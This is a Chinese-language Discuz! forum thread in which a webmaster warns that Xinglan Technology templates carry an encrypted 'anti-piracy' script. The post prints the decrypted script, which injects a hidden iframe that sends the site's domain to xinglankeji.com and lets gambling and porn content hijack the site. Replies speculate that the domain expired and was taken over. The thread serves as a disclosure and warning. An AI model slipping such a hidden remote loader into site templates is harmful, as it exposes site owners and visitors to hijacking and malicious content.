设为首页收藏本站

Discuz! 官方站

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

查看: 1162|回复: 4

星蓝科技的模板挂马。。赌博网站。所有安装过星蓝科技模板的站长

[复制链接]
发表于 2018-4-10 10:20:58 | 显示全部楼层 |阅读模式
投诉举报
网站 URL: 隐藏内容
网站 ID: 隐藏内容
联系方式: 隐藏内容
应用URL: 隐藏内容
本帖最后由 反反复复凤飞飞 于 2018-8-8 08:33 编辑

星蓝科技的模板购买之后
js当中有一段加密的模板防盗链接连到 xinglankeji.com,


←这网站全是木马病毒和赌博色情各种东西都会被加载到安装模板的站点。。。。

会直接通过下面的“防盗版”加载到安装模板的网站,
然后所有使用模板的网站都会黑链劫持,各类赌博色情网站,甚至直接弹出不法广告;

  1. host = window.location.href;
  2. host2 = document.domain;
  3. function parentFunction() {
  4.     jQuery("link").attr("href", "error")
  5. }
  6. function get() {
  7.     jQuery("head").append("<iframe id='gone_studio' src='http://www.xinglankeji.com/plugin.php?id=tplfangdao:ajax&tpldir=" + tpldir + "&domain=" + host + "' style='display: none'></iframe>")
  8. }
  9. get();
复制代码
(解密后的“防盗版”部分)


搜索发现discuz官方论坛以前已经有好几个站长反馈过,
都被一群大牛给歪楼解释为正常的防盗版给忽视了,

所有安装星蓝科技模板并且有这个防盗版的网站都挂上各种赌博色情等等违法广告

联系作者一直没有回复。。。
模板再好
挂一年多非法链接也太说不过去了,
不知道自己网站全是病毒么,

请星蓝的出来处理一下吧


未命名-16.jpg TIM图片20180410122336.png
各种博彩 色情网站截图自行补脑

发表于 2018-4-11 09:51:26 | 显示全部楼层
Tardis.Labs 发表于 2018-4-10 17:32
这个应该验证模板被谁使用,防止盗版的代码吧,然后开发者网站被挂马了,估计他自己都不知道。让他把网站恢 ...

并不是,域名到期被人抢注了,然后就XXOO
回复

使用道具 举报

发表于 2018-4-10 17:32:50 | 显示全部楼层
这个应该验证模板被谁使用,防止盗版的代码吧,然后开发者网站被挂马了,估计他自己都不知道。让他把网站恢复正常就可以了
回复

使用道具 举报

发表于 2018-4-12 15:40:35 | 显示全部楼层
⑧穿内裤 发表于 2018-4-11 09:51
并不是,域名到期被人抢注了,然后就XXOO

这个厉害了,这个开发者也太忙了吧?忙得连这些都不注意,模板应该都下架调整一下吧?至少得把这些代码给去掉,对别的站长多少会有影响。
回复

使用道具 举报

发表于 2018-4-12 15:49:13 | 显示全部楼层
真实地址和应用的地址都没填写……你让婶子们如何处理?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|手机版|Archiver|Comsenz ( 粤B2-20090059-165 )  star

GMT+8, 2018-9-25 13:52

Powered by Discuz! X3.3

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表